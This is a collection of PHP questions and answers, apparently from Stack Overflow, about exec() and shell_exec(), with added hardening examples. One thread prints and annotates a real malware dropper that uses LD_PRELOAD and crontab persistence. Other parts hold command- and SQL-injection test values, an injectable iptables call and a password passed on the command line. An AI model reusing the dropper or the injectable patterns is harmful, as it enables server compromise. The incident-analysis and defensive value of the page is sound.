using exec(); in PHP with variables - php

I'm trying to execute a command on a local Debian server. The code is as follows:
if (isset($INPUTdifference)) {
    $counter = count($INPUTdifference);
    for ($i = 0; $i < $counter; $i++) {
        $pkts = $INPUTdifference[$i]["pkts"];
        $bytes = $INPUTdifference[$i]["bytes"];
        $target = $INPUTdifference[$i]["target"]; // = -j
        $prot = $INPUTdifference[$i]["prot"]; // = -p
        $opt = $INPUTdifference[$i]["opt"];
        $in = $INPUTdifference[$i]["in"]; // = -i
        $out = $INPUTdifference[$i]["out"]; // = -o
        $source = $INPUTdifference[$i]["source"]; // = -s
        $destination = $INPUTdifference[$i]["destination"]; // -d
        //Filter results
        $badOpt;
        if (strcmp($opt, $badOpt)) {
            $opt = "all";
            return $opt;
        }
        // Execute command with parameters acquired from array
        exec("sudo /sbin/iptables -A INPUT -j $target -p $prot -i $in -o $out -s $source -d $destination ");
        echo 'complete yo';
    }
}
As you can see, I'm trying to use values from the array in my exec call. The values are all tested and get parsed correctly.
I try to execute the command, and it doesn't give me any feedback/results on the server. At first it was cussing about how I didn't get a parameter right, but I fixed that. So it -is- getting executed on the server. That, I guess, narrows it down to the syntax itself... am I missing something here?

You might want to put the direct /path/to/sudo instead of just sudo. exec doesn't always manage to find the path by itself.
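As an added example (not code from the question or the answer above), here is the same per-row iptables call built so that every value is allow-listed and passed through escapeshellarg(), with the exit status and the command's own error text captured instead of discarded. Two things the question's string interpolation does not protect against are shown with constructed rows: a shell metacharacter in the interface name and a quote in the source address. The example also leaves out -o, because iptables rejects -o on the INPUT chain ("Can't use -o with INPUT"); once exit status and stderr are captured, that kind of message no longer disappears. The sudo path, the allow-lists and the sudoers policy are assumptions.

```php
<?php
// Added example, not code from the original question or answer: build the
// iptables call from one $INPUTdifference row with allow-listed values and
// escapeshellarg(), then capture exit status and output so failures are visible.
// Assumptions: sudo lives at /usr/bin/sudo, the web server user may run
// /sbin/iptables via sudoers, and the allow-lists below match your policy.

const SUDO     = '/usr/bin/sudo';
const IPTABLES = '/sbin/iptables';

function validateRule(array $row): array
{
    $targets = ['ACCEPT', 'DROP', 'REJECT'];
    $protos  = ['tcp', 'udp', 'icmp', 'all'];

    $target = strtoupper(trim((string)($row['target'] ?? '')));
    if (!in_array($target, $targets, true)) {
        throw new InvalidArgumentException('target not allowed: ' . ($row['target'] ?? ''));
    }
    $prot = strtolower(trim((string)($row['prot'] ?? 'all')));
    if (!in_array($prot, $protos, true)) {
        throw new InvalidArgumentException('protocol not allowed: ' . ($row['prot'] ?? ''));
    }
    // Interface names: short tokens, no whitespace or shell characters ('*' means any).
    $in = trim((string)($row['in'] ?? ''));
    if ($in !== '' && $in !== '*' && !preg_match('/^[A-Za-z0-9._-]{1,15}$/', $in)) {
        throw new InvalidArgumentException("interface not allowed: $in");
    }
    // Source/destination: dotted IPv4, optionally with a /prefix ('' or 0.0.0.0/0 means any).
    $addrs = [];
    foreach (['source', 'destination'] as $key) {
        $v = trim((string)($row[$key] ?? ''));
        if ($v === '' || $v === '0.0.0.0/0') { $addrs[$key] = ''; continue; }
        [$ip, $prefix] = array_pad(explode('/', $v, 2), 2, null);
        $okIp  = filter_var($ip, FILTER_VALIDATE_IP, FILTER_FLAG_IPV4) !== false;
        $okLen = $prefix === null || (ctype_digit($prefix) && (int)$prefix <= 32);
        if (!$okIp || !$okLen) {
            throw new InvalidArgumentException("$key not allowed: $v");
        }
        $addrs[$key] = $v;
    }
    return ['target' => $target, 'prot' => $prot, 'in' => $in === '*' ? '' : $in] + $addrs;
}

function buildIptablesCommand(array $r): string
{
    // Every argument goes through escapeshellarg(); only the static flags are bare.
    $argv = [SUDO, IPTABLES, '-A', 'INPUT', '-p', $r['prot']];
    if ($r['in'] !== '')          { array_push($argv, '-i', $r['in']); }
    if ($r['source'] !== '')      { array_push($argv, '-s', $r['source']); }
    if ($r['destination'] !== '') { array_push($argv, '-d', $r['destination']); }
    array_push($argv, '-j', $r['target']);
    // 2>&1 so iptables' own error text (a rejected option, a sudo refusal) is captured too.
    return implode(' ', array_map('escapeshellarg', $argv)) . ' 2>&1';
}

function applyRule(array $row): array
{
    $cmd    = buildIptablesCommand(validateRule($row));
    $output = [];
    $status = 1;
    exec($cmd, $output, $status);        // $status is the exit code, 0 = success
    return ['cmd' => $cmd, 'status' => $status, 'output' => $output];
}

// Constructed sample rows in the question's layout (pkts/bytes/opt are not used here).
$rows = [
    ['target' => 'DROP',   'prot' => 'tcp', 'in' => 'eth0',           'source' => '203.0.113.0/24', 'destination' => ''],
    ['target' => 'DROP',   'prot' => 'tcp', 'in' => 'eth0; rm -rf /', 'source' => '',               'destination' => ''],
    ['target' => 'ACCEPT', 'prot' => 'tcp', 'in' => 'eth0',           'source' => "1.2.3.4'\$(id)", 'destination' => ''],
];
foreach ($rows as $row) {
    try {
        $r = applyRule($row);
        printf("%s\nexit=%d %s\n", $r['cmd'], $r['status'], implode(' | ', $r['output']));
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), "\n";
    }
}
```

The first row produces a command line with every value single-quoted and runs it; the other two never reach exec() because validation throws. On the sudo side, pair this with a sudoers entry that names the exact binary (for instance `www-data ALL=(root) NOPASSWD: /sbin/iptables`, an assumed policy) rather than a blanket grant, since the PHP process is the thing an attacker reaches first.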

Related

How to run Fast lane in terminal using php? exec() or shell_exec()

I was trying to run fastlane commands in the terminal using PHP. Commands like cd, pwd, ls and chmod work fine in PHP using the exec or shell_exec functions, but when I try to run a fastlane command it throws error 127. How can I run fastlane using PHP?
function terminal($command)
{
    $output = [];
    $return_var = '';
    //exec
    if (function_exists('exec')) {
        exec($command, $output, $return_var);
    } else {
        $output = 'Command execution not possible on this system';
        $return_var = 1;
    }
    return array('output' => $output, 'status' => $return_var);
}
// $path = "cd /Applications/XAMPP/xamppfiles/htdocs/mystudiomobile/cordova7/platforms/ios/fastlane";
// $path_c = "fastlane init"; path and path_c present in test.sh
$command = "/Applications/XAMPP/xamppfiles/htdocs/php1/test.sh";
$path_change = terminal("$command");
if ($path_change['status'] == 0) {
    echo json_encode($path_change['output']);
    echo $path_change['status'];
} else {
    echo "some problem";
    echo $path_change['status'];
}
I found out that there are limitations in PHP on performing HTTP and HTTPS protocols using system functions like exec, which could not run fastlane. The best practice is to go with a bash script which accesses PHP instead of vice versa.
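An added example, not code from the post above, for diagnosing an exit status of 127: that value is what a POSIX shell returns when it cannot find the command at all, so the useful thing to capture is the shell's own message and the PATH the child actually saw. The wrapper below uses proc_open() instead of exec() so that stdout, stderr and the exit code come back separately and the environment is set explicitly. The PATH, HOME and project directory values are assumptions (the directory is the one named in the question); fastlane itself is simply whatever `command -v fastlane` resolves to for the web server user.

```php
<?php
// Added example, not code from the original post: run a command through
// proc_open() with an explicit environment and read stdout, stderr and the exit
// status separately. A 127 then arrives together with the shell's "not found"
// message instead of an empty $output. PATH, HOME and the project directory
// below are assumptions; set them to values that work for the web server user.

function runCommand(array $argv, array $env, ?string $cwd = null): array
{
    // Build the line from escaped arguments; never interpolate raw strings.
    $cmd  = implode(' ', array_map('escapeshellarg', $argv));
    $spec = [0 => ['pipe', 'r'], 1 => ['pipe', 'w'], 2 => ['pipe', 'w']];
    $proc = proc_open($cmd, $spec, $pipes, $cwd, $env);
    if (!is_resource($proc)) {
        return ['status' => -1, 'stdout' => '', 'stderr' => 'proc_open() failed'];
    }
    fclose($pipes[0]);                       // nothing to feed on stdin
    // Fine for short-lived commands; for chatty ones read both pipes with
    // stream_select() so a full stderr buffer cannot stall the child.
    $stdout = stream_get_contents($pipes[1]);
    $stderr = stream_get_contents($pipes[2]);
    fclose($pipes[1]);
    fclose($pipes[2]);
    $status = proc_close($proc);             // exit code of the child shell
    return ['status' => $status, 'stdout' => $stdout, 'stderr' => $stderr];
}

function explainStatus(int $status): string
{
    switch ($status) {
        case 0:   return 'ok';
        case 126: return 'found but not executable for this user';
        case 127: return 'command not found in the PATH given to the child';
        default:  return "exited with status $status";
    }
}

// Environment for the child: PATH decides whether "fastlane" resolves at all,
// HOME is where Ruby/gem tooling looks for its configuration. (assumed values)
$env = [
    'PATH' => '/usr/local/bin:/usr/bin:/bin',
    'HOME' => '/var/www',
    'LANG' => 'en_US.UTF-8',
];
$project = '/Applications/XAMPP/xamppfiles/htdocs/mystudiomobile/cordova7/platforms/ios';

// Step 1: ask the shell where (or whether) the binary resolves with that PATH.
$where = runCommand(['sh', '-c', 'command -v fastlane'], $env);
if ($where['status'] !== 0) {
    echo "fastlane is not on PATH={$env['PATH']} for this user; exec() would return 127\n";
} else {
    printf("fastlane resolves to %s\n", trim($where['stdout']));
    // Step 2: run a non-interactive fastlane command from the project directory.
    $r = runCommand(['fastlane', '--version'], $env, $project);
    printf("%s\n%s%s", explainStatus($r['status']), $r['stdout'], $r['stderr']);
}
```

If step 1 fails, the fix is the PATH handed to the child (add the directory that `which fastlane` prints in an interactive shell), not the PHP code; if step 1 succeeds and fastlane still fails, the stderr text now says why.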

Powershell output to PHP variable using shell_exec

I have a powershell script which outputs a video file duration. Running this script gives me the expected result.
$Folder = 'C:\my\path\to\folder'
$File = 'sample1_1280_720.mp4'
$LengthColumn = 27
$objShell = New-Object -ComObject Shell.Application
$objFolder = $objShell.Namespace($Folder)
$objFile = $objFolder.ParseName($File)
$Length = $objFolder.GetDetailsOf($objFile, $LengthColumn)
Write-Output $Length
In a php file, I'm trying to save this output to a variable.
<?php
$var = shell_exec("powershell -File C:\my\path\to\psFile.ps1 2>&1");
echo "<pre>$var</pre>";
?>
The string output I get from shell_exec is the text you see when you start PowerShell from cmd:
Windows PowerShell
Copyright (C) 2016 Microsoft Corporation. All rights reserved.
Any suggestions on how to extract the video duration?
Using your PS code
$Folder = 'C:\my\path\to\folder'
$File = 'sample1_1280_720.mp4'
$LengthColumn = 27
$objShell = New-Object -ComObject Shell.Application
$objFolder = $objShell.Namespace($Folder)
$objFile = $objFolder.ParseName($File)
$Length = $objFolder.GetDetailsOf($objFile, $LengthColumn)
$Length
I'm able to get the file length using PS -File and -Command. I added a few other flags you may want or need. You shouldn't need to use redirection 2>&1 to get your variable from PS to PHP. It is most likely the reason you are getting the logo.
function PowerShellCommand($Command)
{
    $unsanitized = sprintf('powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -Command "%s"', $Command);
    return shell_exec($unsanitized);
}
function PowerShellFile($File)
{
    $unsanitized = sprintf('powershell.exe -NonInteractive -NoProfile -ExecutionPolicy Bypass -File "%s"', $File);
    return shell_exec($unsanitized);
}
// Can use relative paths
echo PowerShellCommand("./psFile.ps1");
// Be sure to escape Windows paths if needed
echo PowerShellFile("C:\\my\\path\\to\\folder\\psFile.ps1");
Returning $Length in all three ways works for me
$Length
return $Length
Write-Output $length
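As an added example (not part of the answer above), the same Shell.Application lookup can be handed to PowerShell through -EncodedCommand, which takes the script as Base64 of UTF-16LE. That sidesteps two problems with building `-Command "%s"` by string formatting: a quote, `$` or `&` inside the command text would otherwise be interpreted by cmd.exe or PowerShell, and only the script's own output is returned. Two details worth knowing: in a double-quoted PHP string such as "C:\my\path\to\psFile.ps1" the `\t` is a tab character, so the path is best written in single quotes; and exit codes set with `exit N` inside the script come back as the process status. The folder, file name and column 27 are taken from the question; the helper names are mine, and the iconv extension is assumed.

```php
<?php
// Added example, not part of the original answer: pass the PowerShell code via
// -EncodedCommand (Base64 of UTF-16LE), so quotes, $ and & in the script cannot
// change the command line that exec() hands to cmd.exe, and nothing but the
// script's output is captured. Folder, file and column 27 come from the
// question; helper names are mine. Requires the iconv extension.

function psEncode(string $script): string
{
    $utf16 = iconv('UTF-8', 'UTF-16LE', $script);
    if ($utf16 === false) {
        throw new RuntimeException('cannot transcode script to UTF-16LE');
    }
    return base64_encode($utf16);
}

// Quote a value as a PowerShell single-quoted literal (only ' needs doubling).
function psQuote(string $value): string
{
    return "'" . str_replace("'", "''", $value) . "'";
}

function runPowerShell(string $script): array
{
    $cmd = 'powershell.exe -NonInteractive -NoProfile -NoLogo -ExecutionPolicy Bypass '
         . '-OutputFormat Text -EncodedCommand ' . psEncode($script) . ' 2>&1';
    $output = [];
    $status = 1;
    exec($cmd, $output, $status);
    return ['status' => $status, 'output' => $output];
}

function videoDuration(string $folder, string $file, int $column = 27): ?string
{
    // Same Shell.Application lookup as the question, with both inputs quoted.
    $script = '$sh = New-Object -ComObject Shell.Application' . "\n"
            . '$f  = $sh.Namespace(' . psQuote($folder) . ')' . "\n"
            . 'if ($null -eq $f) { exit 2 }' . "\n"
            . '$i  = $f.ParseName(' . psQuote($file) . ')' . "\n"
            . 'if ($null -eq $i) { exit 3 }' . "\n"
            . '$f.GetDetailsOf($i, ' . $column . ')' . "\n";
    $r = runPowerShell($script);
    if ($r['status'] !== 0 || !isset($r['output'][0])) {
        return null;                 // status 2 = folder missing, 3 = file missing
    }
    return trim($r['output'][0]);
}

// Single-quoted PHP strings keep backslashes literal; in "C:\my\path\to" the \t is a tab.
$folder = 'C:\my\path\to\folder';
$file   = 'sample1_1280_720.mp4';
$length = videoDuration($folder, $file);
echo $length === null ? "no duration returned\n" : "duration: $length\n";
```

The Base64 form is also what shows up in process listings and logs, so anyone reading them sees an opaque blob rather than the folder path; decode it with `[Text.Encoding]::Unicode.GetString([Convert]::FromBase64String(...))` when debugging.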

I have been hacked, now I have a weird PHP file. What is it doing?

So I was hacked a while ago and now I have a weird PHP file in my file manager. This is its content:
<?php
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
if (! function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
@system("killall -9 ".basename("/usr/bin/host"));
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
$so = $arch == 32 ? $so32 : $so64;
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    $n = unpack("C*", fread($f, 8));
    $so[7] = sprintf("%c", $n[8]);
    fclose($f);
}
$n = file_put_contents("./jquery.so", $so);
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
$HBN=basename("/usr/bin/host");
$SCP=getcwd();
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
@chmod("1.sh", 0777);
@system("at now -f 1.sh", $ret);
if ($ret == 0) {
    for ($i = 0; $i < 5; $i++) {
        if (! @file_exists("1.sh")) {
            print "AT success\n";
            exit(0);
        }
        sleep(1);
    }
}
@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
    for ($i = 0; $i < 62; $i++) {
        if (! @file_exists("1.sh")) {
            print "CRONTAB success\n";
            exit(0);
        }
        sleep(1);
    }
}
@system("./1.sh");
@unlink("1.sh");
?>
Of course, I deleted it. But what did it do? Are there more infected files?
I understand that it checks whether the system is 32-bit or 64-bit, then creates 1.sh and executes it, but what then?
Full code: http://pastebin.com/hejkuQtV
I tried to analyze the code. Have a look at this and check my comments regarding the shell script "1.sh". In my opinion, deleting the PHP script would not be sufficient.
<?php
//probably the attacker wants to check that the script works.
@touch("index.html");
header("Content-type: text/plain");
print "2842123700\n";
//redefine file_put_contents if it doesn't exist
if (! function_exists('file_put_contents')) {
    function file_put_contents($filename, $data) {
        $f = @fopen($filename, 'w');
        if (! $f)
            return false;
        $bytes = fwrite($f, $data);
        fclose($f);
        return $bytes;
    }
}
//kill all running instances of the host command. "host" is used for DNS lookups among other things.
@system("killall -9 ".basename("/usr/bin/host"));
//32 bit
$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x ... ETC ...";
//64 bit
$so64 = "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ ...ETC...";
$arch = 64;
//decide on the architecture based on the value of max int
if (intval("9223372036854775807") == 2147483647)
    $arch = 32;
//the hex based on architecture. "so" probably contains a function() used by "host". The attacker is replacing it later before running the "host" command.
$so = $arch == 32 ? $so32 : $so64;
//read 8 bytes from the "host" binary file, and unpack them as unsigned chars.
$f = fopen("/usr/bin/host", "rb");
if ($f) {
    //n is an array of unsigned chars. Each array item can be (0-255)
    $n = unpack("C*", fread($f, 8));
    //convert to ascii, and replace the 7th character in the string with a value obtained from the "host" binary file.
    //This value from "host" will be specific to the current server/environment - set during compilation/installation.
    //NOTE: The contents of the "so" string will be written to a new file "jquery.so".
    $so[7] = sprintf("%c", $n[8]);
    fclose($f);
}
//the shared object
$n = file_put_contents("./jquery.so", $so);
//The shared object "jquery.so" uses an environment variable named "AU". It's clearer later.
$AU=@$_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"];
//should give "host"
$HBN=basename("/usr/bin/host");
//current dir
$SCP=getcwd();
//Examining the following line, here's what it writes to 1.sh
@file_put_contents("1.sh", "#!/bin/sh\ncd '".$SCP."'\nif [ -f './jquery.so' ];then killall -9 $HBN;export AU='".$AU."'\nexport LD_PRELOAD=./jquery.so\n/usr/bin/host\nunset LD_PRELOAD\ncrontab -l|grep -v '1\.sh'|grep -v crontab|crontab\nfi\nrm 1.sh\nexit 0\n");
/*
 * #!/bin/sh
 * cd '/path/to/1.sh'
 * if [ -f './jquery.so' ];then
 *     killall -9 host;
 *     export AU='MYSERVER.COM/THE/REQUEST/URI' //this will be referenced in "jquery.so"
 *     export LD_PRELOAD=./jquery.so //load the shared object before executing the "host" command. THIS IS THE CORE OF THE ATTACK. Load the attacker's shared object (which contains his function, let's call it "xyz") before executing the "host" command.
 *     /usr/bin/host //execute. At that point, if "host" makes use of function "xyz", it will have been replaced by the malicious "xyz" from "jquery.so". And since you don't know what the attacker's function is actually doing, you should assume YOUR SYSTEM IS COMPROMISED.
 *     unset LD_PRELOAD
 *     crontab -l|grep -v '1\.sh'|grep -v crontab|crontab //not sure about this.
 * fi
 * rm 1.sh //remove
 * exit 0
 */
@chmod("1.sh", 0777);
@system("at now -f 1.sh", $ret); //execute 1.sh. It will be deleted once it has executed, as per the "rm" statement.
if ($ret == 0) {
    //try for 5 seconds until the file is deleted (hence executed). If so, then all good.
    for ($i = 0; $i < 5; $i++) {
        if (! @file_exists("1.sh")) {
            print "AT success\n";
            exit(0);
        }
        sleep(1);
    }
}
//another attempt to execute the file in case the above failed.
@system("(crontab -l|grep -v crontab;echo;echo '* * * * * ".$SCP."/1.sh')|crontab", $ret);
if ($ret == 0) {
    //keep trying for 60 seconds until the file is deleted (as per the crontab setup.)
    for ($i = 0; $i < 62; $i++) {
        if (! @file_exists("1.sh")) {
            print "CRONTAB success\n";
            exit(0);
        }
        sleep(1);
    }
}
//the last resort if the previous execute attempts didn't work.
@system("./1.sh");
@unlink("1.sh");
?>
Here's a little more info. First, we can use this code to generate the ".so" file.
<?php
//build the attack string (this contains the hex representation of the attacker's compiled/linked program)
$so32="\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00.....";
//print it. This will output the binary
echo $so32;
?>
Run it with:
php hack.php > jquery.so
At this point, we have the same shared object that the attacker loaded before running "host". Using "strings" command:
$ strings ./jquery.so
Output:
write
unlink
pthread_mutex_lock
pthread_mutex_unlock
gettimeofday
free
realloc
strdup
read
getaddrinfo
freeaddrinfo
socket
setsockopt
connect
malloc
mmap
munmap
usleep
strcmp
dlclose
pthread_join
__errno_location
strncmp
sprintf
strcpy
time
vsnprintf
strcat
strstr
atoi
strchr
dlopen
dlsym
pthread_create
srandom
lseek
ftruncate
umask
setsid
chroot
_exit
signal
fork
dladdr
realpath
getpid
execl
wait
getsockname
getenv
geteuid
unsetenv
popen
fgets
fclose
QQRW
1c2#N
v[uq
M!k(q.%
jc[Sj
F,%s,%x
R,%d,%d,%d,%s,%s,
P,%u,%u,%u,%u,%u
POST %s HTTP/1.0
Host: %s
Pragma: 1337
Content-Length: %d
core
%s/%s
|$$$}rstuvwxyz{$$$$$$$>?#ABCDEFGHIJKLMNOPQRSTUVW$$$$$$XYZ[\]^_`abcdefghijklmnopq
/dev/null
%s/%c.%d
(null)
ROOT
LD_PRELOAD
/usr/bin/uname -a
/tmp
As you can see, his hack seems to be using lots of functions, including doing a POST request somewhere. It's not possible, of course, to figure it out from the above, but it gives you some clue.
If you want to take this further, you can look into an ELF decompiler. But I doubt that you will be able to reach anything conclusive. I am not an expert, but my advice is to keep on monitoring your network activity for anything out of the ordinary.
The "file" command gives you a bit of information about the file - hence ELF decompiler.
$ file ./jquery.so
Output:
./jquery.so: ELF 32-bit LSB shared object, Intel 80386, version 1 (SYSV), dynamically linked, stripped
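An added example, not part of the answer above, that decodes the ELF identification bytes with the same unpack() calls the dropper uses. It makes two points concrete: unpack("C*") returns a 1-based array, so $n[8] is the byte at offset 7 of /usr/bin/host, and offset 7 of an ELF header is EI_OSABI (the ABI tag: 0 for SYSV, 3 for GNU/Linux). The dropper therefore copies the system's own ABI tag into the payload before writing jquery.so, which reads as an attempt to make the object look native to whatever loader is on that box. The sample bytes are the 48-byte prefix of $so64 quoted in the question, zero-padded to a full header (a constructed, truncated sample that cannot be loaded); the stand-in "host" header is constructed too, tagged GNU/Linux so the patch is visible.

```php
<?php
// Added example, not part of the original answer: decode the ELF identification
// bytes of the dropped object with the same unpack() calls the dropper uses, to
// show what "$so[7] = sprintf('%c', $n[8])" actually changes. The 48-byte sample
// below is the prefix of $so64 quoted in the question, zero-padded to a full
// header (a constructed, truncated sample; it is not a loadable object).

const EI_CLASS = 4, EI_DATA = 5, EI_OSABI = 7;   // byte offsets within e_ident

function elfHeaderInfo(string $bytes): array
{
    if (strlen($bytes) < 20 || substr($bytes, 0, 4) !== "\x7fELF") {
        throw new InvalidArgumentException('not an ELF image');
    }
    // unpack("C*") is 1-based: $id[8] is the byte at offset 7 (EI_OSABI),
    // which is why the dropper's $n[8] lands in $so[7].
    $id     = unpack('C*', substr($bytes, 0, 16));
    $little = $id[EI_DATA + 1] === 1;
    // e_type and e_machine follow e_ident; their byte order comes from EI_DATA.
    $hdr = unpack($little ? 'vtype/vmachine' : 'ntype/nmachine', substr($bytes, 16, 4));

    $types    = [0 => 'NONE', 1 => 'REL', 2 => 'EXEC', 3 => 'DYN (shared object)', 4 => 'CORE'];
    $machines = [3 => 'Intel 80386', 40 => 'ARM', 62 => 'x86-64', 183 => 'AArch64'];
    $osabis   = [0 => 'SYSV', 3 => 'GNU/Linux', 9 => 'FreeBSD'];

    return [
        'class'      => $id[EI_CLASS + 1] === 2 ? '64-bit' : '32-bit',
        'data'       => $little ? 'LSB' : 'MSB',
        'osabi'      => $id[EI_OSABI + 1],
        'osabi_name' => $osabis[$id[EI_OSABI + 1]] ?? 'unknown',
        'type'       => $types[$hdr['type']] ?? 'unknown',
        'machine'    => $machines[$hdr['machine']] ?? sprintf('0x%x', $hdr['machine']),
    ];
}

// The dropper's patch, reproduced on in-memory bytes only: copy the EI_OSABI byte
// of the system's own binary into the payload so both carry the same ABI tag.
function copyOsabi(string $payload, string $hostHeader): string
{
    $n = unpack('C*', substr($hostHeader, 0, 8));
    $payload[EI_OSABI] = sprintf('%c', $n[8]);
    return $payload;
}

function describe(array $i): string
{
    return sprintf('ELF %s %s %s, %s, OSABI %d (%s)',
        $i['class'], $i['data'], $i['type'], $i['machine'], $i['osabi'], $i['osabi_name']);
}

// Prefix of $so64 from the question: e_ident, e_type=3, e_machine=0x3e, e_version=1,
// e_entry=0x1378, e_phoff=0x40; zero-padded to a 64-byte header.
$so64 = str_pad(
    "\x7f\x45\x4c\x46\x02\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00"
  . "\x03\x00\x3e\x00\x01\x00\x00\x00\x78\x13\x00\x00\x00\x00\x00\x00"
  . "\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00",
    64, "\x00");
// Constructed stand-in for the first 8 bytes of /usr/bin/host on a system whose
// binaries are tagged GNU/Linux (EI_OSABI = 3) rather than SYSV (0).
$hostHeader = "\x7fELF\x02\x01\x01\x03";

echo 'dropped: ', describe(elfHeaderInfo($so64)), "\n";
echo 'patched: ', describe(elfHeaderInfo(copyOsabi($so64, $hostHeader))), "\n";
```

For the 64-bit payload this reports a little-endian x86-64 shared object, the same facts `file` printed for the 32-bit one above, with the OSABI field moving from 0 to 3 after the patch. Reading the rest of the dropped script the same way: the `crontab -l|grep -v '1\.sh'|grep -v crontab|crontab` line in 1.sh removes the `* * * * * .../1.sh` entry the PHP added, so after a successful run neither 1.sh nor the cron line remains, while jquery.so and the LD_PRELOAD-ed `host` process do. When checking a server for this, look for jquery.so in the web root and in /tmp (the strings output lists /tmp), compare `crontab -l` for the web server user and `atq` against what you expect, and search running processes for the preload with `grep -l LD_PRELOAD /proc/[0-9]*/environ` as root.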

How to run SQL Script using specific parameters PHP

I need to run an SQL file (to create a user) from within my PHP. I know how this is done:
$commands = file_get_contents("sql/create_usr.sql");
$commands = explode(";", $commands);
$success = 0;
$total = 0;
foreach ($commands as $command) {
    $command = trim($command);
    if ($command) {
        $success += (@mysql_query($command) == false ? 0 : 1);
        $total += 1;
    }
}
How do I run the SQL file with specific parameters (e.g. username, password) from a PHP file?
Thanks in advance.
You might want to use a simple shell execution for this, instead of splitting the file with PHP:
shell_exec( 'mysql DATABASE -u USERNAME -pPASSWORD < sql/create_usr.sql' );
To test, if you can run a SQL-Query using shell_exec you might want to try this code:
echo shell_exec( 'mysql DATABASE -u USERNAME -pPASSWORD -e "SELECT DATABASE();" 2>&1' );
Read your file line by line and then execute the statement:
$handle = fopen("inputfile.txt", "r");
if ($handle) {
    while (($line = fgets($handle)) !== false) {
        // process the line read.
    }
    fclose($handle);
} else {
    // error opening the file.
}
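An added example, not code from the question or either answer, that runs the SQL file with the username and password supplied from PHP while keeping both values off any shell command line (MySQL's own documentation calls a password given as `-pPASSWORD` insecure, since it is visible to other users of the host). The file uses {{username}} and {{password}} placeholders, each replaced with a value quoted by the PDO driver for the live connection, and the file is split into statements by a small splitter that ignores `;` inside quoted strings and `--` comments, which the plain explode(";") above cannot do. The template text, the placeholder syntax, the DSN and the admin account are assumptions; sql/create_usr.sql stays your file.

```php
<?php
// Added example, not code from the original question or answers: run the SQL
// file through PDO with the username and password filled into {{placeholders}}
// that are quoted by the database driver, so neither value touches a shell
// command line. Template text, placeholder syntax, DSN and admin credentials
// are assumptions for this illustration.

// Split on ';' only outside quoted strings and '--' line comments.
function splitSqlStatements(string $sql): array
{
    $stmts = [];
    $buf   = '';
    $quote = null;
    $len   = strlen($sql);
    for ($i = 0; $i < $len; $i++) {
        $c = $sql[$i];
        if ($quote !== null) {                       // inside '...', "..." or `...`
            $buf .= $c;
            if ($c === '\\' && $i + 1 < $len) {      // keep the escaped char verbatim
                $buf .= $sql[++$i];
            } elseif ($c === $quote) {
                $quote = null;
            }
            continue;
        }
        if ($c === "'" || $c === '"' || $c === '`') {
            $quote = $c;
            $buf  .= $c;
        } elseif ($c === '-' && substr($sql, $i, 2) === '--') {
            $nl = strpos($sql, "\n", $i);            // skip to end of the comment
            $i  = $nl === false ? $len : $nl;
        } elseif ($c === ';') {
            if (trim($buf) !== '') { $stmts[] = trim($buf); }
            $buf = '';
        } else {
            $buf .= $c;
        }
    }
    if (trim($buf) !== '') { $stmts[] = trim($buf); }
    return $stmts;
}

// Replace {{name}} with the driver-quoted value; an unknown name is an error, not ''.
function renderSqlTemplate(string $template, array $params, PDO $pdo): string
{
    return preg_replace_callback('/\{\{(\w+)\}\}/', function (array $m) use ($params, $pdo) {
        if (!array_key_exists($m[1], $params)) {
            throw new RuntimeException("no value for placeholder {$m[1]}");
        }
        return $pdo->quote((string)$params[$m[1]]);
    }, $template);
}

function createDbUser(PDO $pdo, string $template, string $username, string $password): int
{
    // MySQL account names are at most 32 characters; keep them to a plain token as well.
    if (!preg_match('/^[A-Za-z0-9_]{1,32}$/', $username)) {
        throw new InvalidArgumentException('username must match [A-Za-z0-9_]{1,32}');
    }
    $sql = renderSqlTemplate($template, ['username' => $username, 'password' => $password], $pdo);
    $n = 0;
    foreach (splitSqlStatements($sql) as $stmt) {
        $pdo->exec($stmt);                           // ERRMODE_EXCEPTION makes failures throw
        $n++;
    }
    return $n;
}

// Constructed template standing in for sql/create_usr.sql.
$template = <<<'SQL'
-- create a least-privilege application account
CREATE USER {{username}}@'localhost' IDENTIFIED BY {{password}};
GRANT SELECT, INSERT, UPDATE ON app.* TO {{username}}@'localhost';
FLUSH PRIVILEGES;
SQL;

// Assumed DSN and admin account; the admin password comes from the environment, not the code.
$pdo = new PDO('mysql:host=127.0.0.1;dbname=app;charset=utf8mb4', 'admin', getenv('DB_ADMIN_PW') ?: '',
               [PDO::ATTR_ERRMODE => PDO::ERRMODE_EXCEPTION]);
// A password containing quote, semicolon and comment characters stays a single literal.
$count = createDbUser($pdo, $template, 'report_ro', "p4ss'; DROP DATABASE app; --");
echo "executed $count statements\n";
```

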